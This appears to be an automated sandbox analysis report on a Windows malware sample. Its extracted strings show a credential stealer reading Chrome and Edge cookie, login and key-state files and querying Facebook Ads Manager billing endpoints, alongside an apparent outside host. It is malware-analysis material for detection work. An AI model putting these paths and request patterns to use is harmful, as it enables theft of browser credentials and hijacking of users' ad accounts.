                                        • String ID: -$/ads/manager/account_settings/account_billing$/adsmanager/creation?act=$/api/graphql/$/www.facebook.com/$Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.$Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.$Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.$Accept: */*$Accept: */*$Accept: */*$Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0$Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0$Connection: keep-alive$Connection: keep-alive$Content-Type: application/x-www-form-urlencoded$Content-type: application/x-www-form-urlencoded$Error (WinHttpAddRequestHeaders)$Error (WinHttpSetOption)$GET$Host: www.facebook.com$Host: www.facebook.com$Origin: https://www.facebook.com$Origin: https://www.facebook.com$Origin: https://www.facebook.com$Origin: https://www.facebook.com$POST$Referer: https://www.facebook.com/$Referer: https://www.facebook.com/$Sec-Fetch-Dest: document$Sec-Fetch-Dest: document$Sec-Fetch-Dest: document$Sec-Fetch-Dest: document$Sec-Fetch-Dest: document$Sec-Fetch-Dest: empty$Sec-Fetch-Dest: empty$Sec-Fetch-Dest: empty$Sec-Fetch-Mode: cors$Sec-Fetch-Mode: cors$Sec-Fetch-Mode: cors$Sec-Fetch-Mode: navigate$Sec-Fetch-Mode: navigate$Sec-Fetch-Mode: navigate$Sec-Fetch-Mode: navigate$Sec-Fetch-Mode: navigate$Sec-Fetch-Site: none$Sec-Fetch-Site: none$Sec-Fetch-Site: none$Sec-Fetch-Site: same-origin$Sec-Fetch-Site: same-origin$Sec-Fetch-Site: same-origin$Sec-Fetch-Site: same-origin$Sec-Fetch-Site: same-site$Sec-Fetch-User: ?1$Sec-Fetch-User: ?1$Sec-Fetch-User: ?1$Upgrade-Insecure-Requests: 1$Upgrade-Insecure-Requests: 1$Upgrade-Insecure-Requests: 1$Upgrade-Insecure-Requests: 1$Upgrade-Insecure-Requests: 1$X-FB-Friendly-Name: BillingAMNexusRootQuery$X-FB-Friendly-Name: BillingTransactionTableQuery$api/graphql/?lll=ppp$http://staticimg.youtuuee.com/$https://www.facebook.com/$login/device-based/login$login/device-based/login$manager/account_settings/account_billing$pages/?category=your_pages$primary_location/info$profile.php$sec-ch-ua-mobile: ?0$sec-ch-ua-mobile: ?0$sec-ch-ua: " Not;A Brand";v="99", "Microsoft Edge";v="91", "Chromium";v="91"$sec-ch-ua: " Not;A Brand";v="99", "Microsoft Edge";v="91", "Chromium";v="91"$v10.0/act_$viewport-width: 1920$viewport-width: 1920
                                        • API String ID: 2490173491-420276689
                                        • Opcode ID: 5be8e1d1bd298a71d1af7ef2746d2fc86b09a4dfed30462034d4a02046d4cad9
                                        • Instruction ID: 5b687cae87f81de7897f35c74f4c9559ed91acd7c9bbb37651cff75e3fcef7fd
                                        • Opcode Fuzzy Hash: 5be8e1d1bd298a71d1af7ef2746d2fc86b09a4dfed30462034d4a02046d4cad9
                                        • Instruction Fuzzy Hash: E6235F22B299C291EB10FB15EC546F9A366FF81780FC05132D99E43AA9DF2DD549CF20
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1994418947.00007FF72F5C1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FF72F5C0000, based on PE: true
                                        • Associated: 00000013.00000002.1994356665.00007FF72F5C0000.00000002.00000001.01000000.00000011.sdmp
                                        • Associated: 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp
                                        • Associated: 00000013.00000002.1994809063.00007FF72F702000.00000004.00000001.01000000.00000011.sdmp
                                        • Associated: 00000013.00000002.1994877080.00007FF72F703000.00000008.00000001.01000000.00000011.sdmp
                                        • Associated: 00000013.00000002.1994932958.00007FF72F70D000.00000004.00000001.01000000.00000011.sdmp
                                        • Associated: 00000013.00000002.1994932958.00007FF72F70F000.00000004.00000001.01000000.00000011.sdmp
                                        • Associated: 00000013.00000002.1995102259.00007FF72F712000.00000002.00000001.01000000.00000011.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ff72f5c0000_Mon17c604381c7047e.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$AttributesFile$Concurrency::cancel_current_task$FolderPath
                                        • String ID: "$\Cookies$\Cookies$\Google\Chrome\User Data\Default\Cookies$\Google\Chrome\User Data\Default\Login Data$\Google\Chrome\User Data\Local State$\Google\Chrome\User Data\Profile $\Google\Chrome\User Data\Profile $\Login Data$\Login Data$\Microsoft\Edge\User Data\Default\Cookies$\Microsoft\Edge\User Data\Default\Login Data$\Microsoft\Edge\User Data\Local State$\Microsoft\Edge\User Data\Profile $\Microsoft\Edge\User Data\Profile $action_url$cookies$cookies$cookies$cookies$facebook.com$facebook.com$host_key$login$login$login$login$origin_url$state$state$state$state
                                        • API String ID: 2211593764-2496850475
                                        • Opcode ID: fe3381858fa7bd5d452d258ce4732713b2fe3803a7ac582883b4252d94ad68ad
                                        • Instruction ID: 9a7e883807a71f74a65522d2acda269e54a4d782211c7ed71efa79ac58190d83
                                        • Opcode Fuzzy Hash: fe3381858fa7bd5d452d258ce4732713b2fe3803a7ac582883b4252d94ad68ad
                                        • Instruction Fuzzy Hash: 0703D122B28AC685EB00EF64D8403EDA376FB81798F805236EA5D17AD9DF7CD545CB10

                                        Control-flow Graph (rendered graph not reproduced): function at 7ff72f5d1f30; its blocks call WinHttpGetProxyForUrl, WinHttpGetIEProxyConfigForCurrentUser, WinHttpSetOption and GetLastError.
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1994418947.00007FF72F5C1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FF72F5C0000, based on PE: true
                                        • Associated: 00000013.00000002.1994356665.00007FF72F5C0000.00000002.00000001.01000000.00000011.sdmp
                                        • Associated: 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp
                                        • Associated: 00000013.00000002.1994809063.00007FF72F702000.00000004.00000001.01000000.00000011.sdmp
                                        • Associated: 00000013.00000002.1994877080.00007FF72F703000.00000008.00000001.01000000.00000011.sdmp
                                        • Associated: 00000013.00000002.1994932958.00007FF72F70D000.00000004.00000001.01000000.00000011.sdmp
                                        • Associated: 00000013.00000002.1994932958.00007FF72F70F000.00000004.00000001.01000000.00000011.sdmp
                                        • Associated: 00000013.00000002.1995102259.00007FF72F712000.00000002.00000001.01000000.00000011.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ff72f5c0000_Mon17c604381c7047e.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$HttpProxy$ConfigCurrentUser
                                        • String ID: Error (WinHttpSetOption)$Error (WinHttpSetOption)
                                        • API String ID: 151569862-2338077917
                                        • Opcode ID: 4bbd54a0064872421c0b17b59afbda93a7c32443171410c2743db2ee95a97a07
                                        • Instruction ID: 5d43be29eca884c0dc5b8cc880ae4055819a74a320e27160f36329bd0b65902e
                                        • Opcode Fuzzy Hash: 4bbd54a0064872421c0b17b59afbda93a7c32443171410c2743db2ee95a97a07
                                        • Instruction Fuzzy Hash: A2F1B422B19BC181EB10DF65E8443EEE365FB84794F909232EA9D43A99DF7CD185CB10

                                        Control-flow Graph (rendered graph not reproduced): function at 7ff72f664fd0; calls GetFileAttributesW.
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1994418947.00007FF72F5C1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FF72F5C0000, based on PE: true
                                        • Associated: 00000013.00000002.1994356665.00007FF72F5C0000.00000002.00000001.01000000.00000011.sdmp
                                        • Associated: 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp
                                        • Associated: 00000013.00000002.1994809063.00007FF72F702000.00000004.00000001.01000000.00000011.sdmp
                                        • Associated: 00000013.00000002.1994877080.00007FF72F703000.00000008.00000001.01000000.00000011.sdmp
                                        • Associated: 00000013.00000002.1994932958.00007FF72F70D000.00000004.00000001.01000000.00000011.sdmp
                                        • Associated: 00000013.00000002.1994932958.00007FF72F70F000.00000004.00000001.01000000.00000011.sdmp
                                        • Associated: 00000013.00000002.1995102259.00007FF72F712000.00000002.00000001.01000000.00000011.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_7ff72f5c0000_Mon17c604381c7047e.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 2a0f04c386ea1cea411b0b338e985f6a00596f83678c51350d66cb6874578e50
                                        • Instruction ID: 22750c79263fa4062031f8975c3f943a8b5a3ad97d81f9b7b7c68fdb0d0d428c
                                        • Opcode Fuzzy Hash: 2a0f04c386ea1cea411b0b338e985f6a00596f83678c51350d66cb6874578e50
                                        • Instruction Fuzzy Hash: 86C01264F0658246EA5836292E852B44256FBD6365FD00630D55C916D4E96C58DB4F10